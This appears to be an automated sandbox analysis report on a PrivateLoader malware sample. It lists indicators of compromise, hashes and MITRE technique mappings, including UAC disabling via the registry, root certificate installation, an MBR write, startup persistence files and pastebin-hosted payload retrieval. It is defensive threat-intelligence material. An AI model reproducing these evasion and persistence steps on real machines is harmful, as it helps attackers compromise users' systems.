privateloader | 79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8

Analysis

max time kernel
41s
max time network
150s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
21-05-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe
Size

1.1MB
MD5

b9809bd949c3bc586cdee24b1a6de3df
SHA1

25bbf7f47a779cdce30f67b51b4cfbc2a2e30d7c
SHA256

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8
SHA512

f54dee552c57d6537042a7f53c0c637eb400833fc16f5bb03152abbc743160165cd6cb13017294f37f6c60fff86f19ad50e33eb44dd6036654206200002ff7a2
SSDEEP

24576:PkqodqTS60AU1oSpPFYE2CBeLA/Tzuif8BAzOXW1AwRgeegKx:+D4i0BAqXWweeBx

Score

10^/10

privateloader risepro xmrig bootkit evasion execution loader miner persistence stealer trojan upx

Malware Config

Signatures

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

xiHRfnBKizFr8TNGB2AWFI2t.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	xiHRfnBKizFr8TNGB2AWFI2t.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables (downlaoders) containing URLs to raw contents of a paste 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2204-16-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2204-21-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2204-19-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2204-23-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2204-17-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL

Detects executables packed with or use KoiVM 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2456-6-0x0000000001EC0000-0x0000000001F1C000-memory.dmp	INDICATOR_EXE_Packed_KoiVM

UPX dump on OEP (original entry point) 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2476-265-0x0000000140000000-0x0000000140848000-memory.dmp	UPX
behavioral1/memory/2476-268-0x0000000140000000-0x0000000140848000-memory.dmp	UPX
behavioral1/memory/2476-267-0x0000000140000000-0x0000000140848000-memory.dmp	UPX
behavioral1/memory/2476-266-0x0000000140000000-0x0000000140848000-memory.dmp	UPX
behavioral1/memory/2476-264-0x0000000140000000-0x0000000140848000-memory.dmp	UPX

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2476-268-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2056	powershell.exe
1260	powershell.exe
2496	powershell.exe
1528	powershell.exe
1800	powershell.exe
2296	powershell.exe
2608	powershell.exe
2008	powershell.exe
304	powershell.EXE
332	powershell.exe
2212	powershell.exe
2604	powershell.exe
1936	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

J3Bd05kGcdWhqmPKAo19DW1R.exeupdater.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	J3Bd05kGcdWhqmPKAo19DW1R.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 5 IoCs

Processes:

AddInProcess32.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GdGtfDhff2t2ChjSZ8AbWLQJ.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mW5VDjQwcrSxe3FeEsJHpaCX.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0fbz6IhsPc2Usl2QRmZpAuMt.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WPoV2MqwCu7saIJzxPO86ND6.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CI7DMq0opXodLBD7G6fRv2Al.bat	AddInProcess32.exe

Executes dropped EXE 7 IoCs

Processes:

86HUE2y4YsytNX1op0d40Qrp.exeJ3Bd05kGcdWhqmPKAo19DW1R.exexiHRfnBKizFr8TNGB2AWFI2t.exeupdater.exellnS9RqKK778oo6e03psvyNr.exeInstall.exe

pid	process
1060	86HUE2y4YsytNX1op0d40Qrp.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
1488	xiHRfnBKizFr8TNGB2AWFI2t.exe
476
1756	updater.exe
940	llnS9RqKK778oo6e03psvyNr.exe
1000	Install.exe

Loads dropped DLL 14 IoCs

Processes:

AddInProcess32.exe86HUE2y4YsytNX1op0d40Qrp.exellnS9RqKK778oo6e03psvyNr.exeInstall.exe

pid	process
2204	AddInProcess32.exe
1060	86HUE2y4YsytNX1op0d40Qrp.exe
2204	AddInProcess32.exe
2204	AddInProcess32.exe
2204	AddInProcess32.exe
476
2204	AddInProcess32.exe
940	llnS9RqKK778oo6e03psvyNr.exe
940	llnS9RqKK778oo6e03psvyNr.exe
940	llnS9RqKK778oo6e03psvyNr.exe
940	llnS9RqKK778oo6e03psvyNr.exe
1000	Install.exe
1000	Install.exe
1000	Install.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2476-265-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2476-263-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2476-268-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2476-267-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2476-266-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2476-264-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

3 pastebin.com
5 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

50 api.myip.com
55 ipinfo.io
56 ipinfo.io
49 api.myip.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

86HUE2y4YsytNX1op0d40Qrp.exe

description ioc process

File opened for modification \??\PhysicalDrive0 86HUE2y4YsytNX1op0d40Qrp.exe

flow	ioc
3	pastebin.com
5	pastebin.com

flow	ioc
50	api.myip.com
55	ipinfo.io
56	ipinfo.io
49	api.myip.com

description	ioc	process
File opened for modification	\??\PhysicalDrive0	86HUE2y4YsytNX1op0d40Qrp.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.exeupdater.exexiHRfnBKizFr8TNGB2AWFI2t.exepowershell.exeJ3Bd05kGcdWhqmPKAo19DW1R.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File opened for modification	C:\Windows\System32\GroupPolicy	xiHRfnBKizFr8TNGB2AWFI2t.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	xiHRfnBKizFr8TNGB2AWFI2t.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	xiHRfnBKizFr8TNGB2AWFI2t.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	xiHRfnBKizFr8TNGB2AWFI2t.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	J3Bd05kGcdWhqmPKAo19DW1R.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exeupdater.exe

description	pid	process	target process
PID 2456 set thread context of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 1756 set thread context of 920	1756	updater.exe	conhost.exe
PID 1756 set thread context of 2476	1756	updater.exe	explorer.exe

Drops file in Windows directory 2 IoCs

Processes:

wusa.exewusa.exe

description ioc process

File created C:\Windows\wusa.lock wusa.exe
File created C:\Windows\wusa.lock wusa.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1544 sc.exe
1968 sc.exe
2708 sc.exe
2200 sc.exe
1696 sc.exe
2416 sc.exe
756 sc.exe
300 sc.exe
3032 sc.exe
2944 sc.exe
2424 sc.exe
2624 sc.exe
1736 sc.exe
2588 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

pid	process
1544	sc.exe
1968	sc.exe
2708	sc.exe
2200	sc.exe
1696	sc.exe
2416	sc.exe
756	sc.exe
300	sc.exe
3032	sc.exe
2944	sc.exe
2424	sc.exe
2624	sc.exe
1736	sc.exe
2588	sc.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2324	schtasks.exe
1700	schtasks.exe
1568	schtasks.exe
2128	schtasks.exe
1588	schtasks.exe
332	schtasks.exe
1264	schtasks.exe
2192	schtasks.exe
2932	schtasks.exe
1704	schtasks.exe
1632	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 207a1f6a1dabda01	powershell.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

xiHRfnBKizFr8TNGB2AWFI2t.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	xiHRfnBKizFr8TNGB2AWFI2t.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	xiHRfnBKizFr8TNGB2AWFI2t.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xiHRfnBKizFr8TNGB2AWFI2t.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	xiHRfnBKizFr8TNGB2AWFI2t.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xiHRfnBKizFr8TNGB2AWFI2t.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	xiHRfnBKizFr8TNGB2AWFI2t.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	xiHRfnBKizFr8TNGB2AWFI2t.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	xiHRfnBKizFr8TNGB2AWFI2t.exe
